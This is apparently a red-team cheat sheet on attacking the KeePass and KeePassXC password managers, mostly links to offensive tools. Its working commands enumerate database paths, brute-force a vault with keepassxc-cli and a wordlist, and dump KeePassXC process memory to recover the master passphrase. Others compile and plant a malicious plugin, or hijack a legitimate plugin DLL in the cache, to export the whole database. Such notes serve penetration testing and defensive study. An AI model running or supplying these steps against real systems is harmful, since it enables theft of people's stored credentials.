# KeePass

* <https://blog.harmj0y.net/redteaming/a-case-study-in-attacking-keepass/>
* <https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/>
* <https://habr.com/ru/post/346820/>
* <https://gist.github.com/naksyn/6d5660dacd0730498a274b85d62a77e8>

Enumerate DB locations:

```
Cmd > type %APPDATA%\KeePass\KeePass.config.xml | findstr "<Path>"
```

Unlock with CLI:

```
$ for pw in `cat passwords.txt`; do echo "$pw" | keepassxc-cli ls db.kdbx [--key-file key.keyx] |& grep -v -e Enter -e Error -e If; done
```

## KeePassXC

* <https://github.com/keepassxreboot/keepassxc>

```
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item "C:\Program Files\KeePassXC\KeePassXC.exe")).FileVersion
```

### Extract Passphrase from Memory

* <https://github.com/d3lb3/KeePass-the-Hash>

Using [strings2](https://github.com/glmcdona/strings2):

```
PS > .\strings2.exe -pid (Get-Process KeePassXC) -a -wide > KeePassXC_strings.txt
PS > gc .\KeePassXC_strings.txt | Select-String -Pattern "Passw0"
PS > (gc .\KeePassXC_strings.txt).length
PS > (gc .\KeePassXC_strings.txt).length / 1mb
```

Using `Get-ProcessStrings` from [PowerShellArsenal/MemoryTools](https://github.com/mattifestation/PowerShellArsenal/blob/master/MemoryTools/MemoryTools.ps1):

```
PS > Get-ProcessStrings -Id 1337 | Out-File KeePassXC_strings.txt
$ dos2unix KeePassXC_strings.txt
$ cat KeePassXC_strings.txt | awk '{print $3}' | grep -x '.\{5,30\}' > words
```

## DLL Hijacking

* <https://skr1x.github.io/keepass-dll-hijacking/>

## Extract Passphrase from Memory (< v2.53.1)

**CVE-2023-32784**

* <https://github.com/vdohney/keepass-password-dumper>
* <https://github.com/CMEPW/keepass-dump-masterkey>
* <https://www.forensicxlab.com/posts/keepass/>

## Abusing KeePass Triggers (< v2.54)

* <https://d3lb3.github.io/keepass_triggers_arent_dead/>
* <https://gist.github.com/d3lb3/fb6f5d82e47744f56117b350d94a6029>
* <https://19dx.ru/2023/06/triggery-keepass-mertvy-da-zdravstvuyut-triggery-keepass/>

## Tools

### KeeFarce

* <https://github.com/denandz/KeeFarce>

### KeeFarceReborn

* <https://github.com/d3lb3/KeeFarceReborn>

#### Abusing the KeePass Plugin Cache

* <https://blog.quarkslab.com/post-exploitation-abusing-the-keepass-plugin-cache.html>
* <https://github.com/d3lb3/KeeFarceReborn/tree/main/KeeFarceRebornPlugin>

Export DB by compiling and loading a custom plugin (requires admin's privileges to place the `.plgx` file):

```
Cmd > KeePass.exe --plgx-create C:\KeeFarceReborn\KeeFarceRebornPlugin
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin.plgx "C:\Program Files\KeePass Password Safe 2\Plugins"
```

Export DB by hijacking a legit plugin DLL (requires an existent plugin in use):

```
Cmd > copy "C:\Program Files\KeePass Password Safe 2\KeePass.exe" .
Cmd > devenv /build Release KeeFarceRebornPlugin.sln
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlugin.dll C:\Users\snovvcrash\AppData\Local\KeePass\PluginCache\3o7A46QKgc2z6Yz1JH88\LegitPlugin.dll
```

### KeePassHax

* <https://github.com/HoLLy-HaCKeR/KeePassHax>

### KeeThief

* <https://github.com/GhostPack/KeeThief>

### CrackMapExec

* <https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/modules/keepass_discover.py>
* <https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/modules/keepass_trigger.py>

### KeePwn

* <https://github.com/Orange-Cyberdefense/KeePwn>

### ThievingFox

* <https://blog.slowerzs.net/posts/thievingfox/>
* <https://github.com/Slowerzs/ThievingFox/tree/main/keepassfox>
* <https://github.com/Slowerzs/ThievingFox/tree/main/keepassxcfox>